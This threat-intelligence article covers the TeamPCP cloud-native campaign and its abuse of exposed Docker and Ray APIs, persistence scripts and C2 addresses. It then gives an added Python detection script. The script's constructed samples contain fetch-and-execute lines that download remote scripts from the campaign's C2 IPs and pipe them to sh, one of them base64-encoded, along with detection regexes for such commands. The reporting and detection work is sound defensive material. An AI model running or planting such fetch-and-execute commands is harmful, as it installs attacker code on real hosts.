In December 2025, TeamPCP—also referred to as PCPcat, ShellForce, and DeadCatx3—emerged as a highly skilled cloud-native threat actor that targeted vulnerabilities in React2Shell, Kubernetes clusters, Ray dashboards, Redis servers, and Docker APIs. This article examines how the compromised servers were used. The group started a massive campaign with the goal of building a distributed proxy and scanning infrastructure at scale, then compromising servers to mine cryptocurrency, exfiltrate data, deploy ransomware, and engage in extortion.
While members publicly celebrated stolen data across Telegram channels, infrastructure remained mostly quiet after activity peaked sharply around Christmas Day 2025. Operational scale and integration, rather than technical innovation, are what distinguish TeamPCP. The campaign turns exposed infrastructure into a self-propagating criminal ecosystem by weaponizing well-documented vulnerabilities into a cloud-native exploitation platform. Large-scale automation, not creative exploits, is the strength.
Compromised servers are used for data hosting, command-and-control relays, proxy networks, cryptomining, and scanning. Flare researchers found 185 compromised servers running attacker-deployed containers with consistent command patterns, which gave them a clear picture of TeamPCP tradecraft. The primary command-and-control node at 67.217.57.240 was found on 182 of the compromised hosts; secondary infrastructure at 44.252.85.168 was seen on three more victim servers.
Multiple control endpoints indicate early-stage infrastructure migration or operational redundancy. Most of the compromised data originates from Western nations, with victims concentrated in the human resources, finance, and e-commerce sectors. The majority of victims are cloud infrastructure: AWS and Azure host 36% and 61% of compromised servers, respectively, together making up 97% of the impacted infrastructure.
Attack Mechanism and Worm-Like Propagation

TeamPCP operations start with automated scanning to find exposed Ray dashboards and Docker APIs across large IP ranges.

[Figure: The schematic flow of PCPcat operation (Source: Flare)]

Once access has been verified, the group uses the unauthenticated management APIs to remotely deploy malicious containers or jobs. For Docker, they pull an Alpine image and start a host-networked, self-restarting container that retrieves and runs remote scripts.
For Ray, they submit jobs that run base64-encoded bootstrap payloads. The campaign's operational core is the proxy.sh script, which installs peer-to-peer tools, proxy utilities, tunneling capabilities, and scanners that continuously sweep the internet for further servers to compromise. By registering multiple system services to guarantee long-term persistence, the script effectively turns each compromised host into a self-maintaining scanning and relay node.
When Kubernetes environments are detected, the script branches into a different execution path and drops cluster-specific secondary payloads, suggesting that it was purpose-built for cloud-native targets rather than being generic Linux malware.
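The three deployment and persistence surfaces described above (containers started through the Docker API, Ray jobs carrying base64-encoded bootstrap payloads, and system services registered by the bootstrap script) share a small set of observable traits: host networking, an always-restart policy, a fetch-and-execute command line, an encoded payload, and contact with the C2 addresses. The following triage script is an added example, not code from the article or from Flare; it applies one command-line scorer to all three surfaces. The `docker inspect` field layout (`HostConfig.NetworkMode`, `HostConfig.RestartPolicy.Name`, `Config.Image`, `Config.Entrypoint`, `Config.Cmd`) is the real one; the only values taken from the article are the two C2 addresses. Every record, unit file, URL path and scoring weight below is constructed for the demonstration and is not an observed artifact.

```python
"""Command-line triage for TeamPCP-style container, Ray-job and service deployments.

Added example (not from the article or Flare). One heuristic scorer is applied to
three surfaces: `docker inspect`-shaped records, Ray job entrypoints, and systemd
units. The two C2 addresses are the article's IoCs; all samples are constructed.
"""
import base64
import json
import re
from dataclasses import dataclass, field

KNOWN_C2 = {"67.217.57.240", "44.252.85.168"}  # IoCs named in the article

# "curl|wget ... | sh" or "curl|wget ... && sh": fetch a remote script and run it
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*?(\||&&)\s*(ba)?sh\b")
BASE64_DECODE = re.compile(r"base64\s+(-d|--decode)\b")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64-looking runs


@dataclass
class Finding:
    subject: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points, reason):
        self.score += points
        self.reasons.append(reason)


def _reveal_base64(text):
    """Replace long base64 runs with their decoded text so indicators hidden
    inside an encoded bootstrap payload are still matched by the regexes."""
    def repl(m):
        try:
            return base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace")
        except Exception:  # not valid base64 (e.g. a long hex id): keep as-is
            return m.group(0)
    return B64_RUN.sub(repl, text)


def score_command(cmdline, finding):
    """Indicators common to all surfaces: encoded payload, fetch-and-run, known C2."""
    visible = _reveal_base64(cmdline)
    if BASE64_DECODE.search(cmdline):
        finding.add(2, "base64-decoded payload")
    if FETCH_AND_RUN.search(visible):
        finding.add(3, "fetches and executes a remote script")
    c2 = KNOWN_C2 & set(IPV4.findall(visible))
    if c2:
        finding.add(5, "contacts known C2: " + ", ".join(sorted(c2)))
    return finding


def triage_container(record):
    """Score one `docker inspect` record (field layout follows real output)."""
    f = Finding("container:" + record.get("Id", "?")[:12])
    host_cfg, cfg = record.get("HostConfig", {}), record.get("Config", {})
    if host_cfg.get("NetworkMode") == "host":
        f.add(2, "host networking")
    if host_cfg.get("RestartPolicy", {}).get("Name") in ("always", "unless-stopped"):
        f.add(1, "self-restarting")
    if cfg.get("Image", "").startswith("alpine"):
        f.add(1, "alpine base image")
    cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    return score_command(cmdline, f)


def triage_ray_entrypoint(entrypoint):
    """Score a Ray job entrypoint string (the submitted shell command)."""
    return score_command(entrypoint, Finding("ray-job"))


def triage_systemd_unit(name, unit_text):
    """Score a systemd unit: every ExecStart* line plus a restart-forever policy."""
    f = Finding("unit:" + name)
    if re.search(r"^Restart=always\s*$", unit_text, re.M):
        f.add(1, "self-restarting")
    for m in re.finditer(r"^ExecStart(?:Pre|Post)?=(.*)$", unit_text, re.M):
        score_command(m.group(1), f)
    return f


def suspicious(finding, threshold=5):
    return finding.score >= threshold


# --- constructed samples; URL paths are placeholders, not observed artifacts ---
_PAYLOAD = b"wget -qO- http://67.217.57.240/PLACEHOLDER.sh | sh"
SAMPLE_CONTAINER = {
    "Id": "0123456789abcdef" * 4,
    "Config": {"Image": "alpine:latest", "Entrypoint": ["sh", "-c"],
               "Cmd": [_PAYLOAD.decode()]},
    "HostConfig": {"NetworkMode": "host", "RestartPolicy": {"Name": "always"}},
}
BENIGN_CONTAINER = {
    "Id": "fedcba9876543210" * 4,
    "Config": {"Image": "nginx:1.27", "Entrypoint": ["/docker-entrypoint.sh"],
               "Cmd": ["nginx", "-g", "daemon off;"]},
    "HostConfig": {"NetworkMode": "bridge", "RestartPolicy": {"Name": "no"}},
}
SAMPLE_RAY_ENTRYPOINT = "echo " + base64.b64encode(_PAYLOAD).decode() + " | base64 -d | sh"
SAMPLE_UNIT = ("[Service]\nRestart=always\n"
               "ExecStart=/bin/sh -c 'curl -fsSL http://44.252.85.168/PLACEHOLDER.sh | sh'\n")
BENIGN_UNIT = "[Service]\nRestart=on-failure\nExecStart=/usr/sbin/nginx -g 'daemon off;'\n"

if __name__ == "__main__":
    for f in (triage_container(SAMPLE_CONTAINER), triage_container(BENIGN_CONTAINER),
              triage_ray_entrypoint(SAMPLE_RAY_ENTRYPOINT),
              triage_systemd_unit("sample.service", SAMPLE_UNIT),
              triage_systemd_unit("nginx.service", BENIGN_UNIT)):
        print(json.dumps({"subject": f.subject, "score": f.score,
                          "suspicious": suspicious(f), "reasons": f.reasons}))
```

In practice the records would come from `docker inspect $(docker ps -q)`, the Ray Jobs API listing, and the unit files under /etc/systemd/system; the point of decoding base64 runs before matching is that the article's Ray bootstrap payloads would otherwise hide both the fetch-and-run pattern and the C2 address from a plain string match.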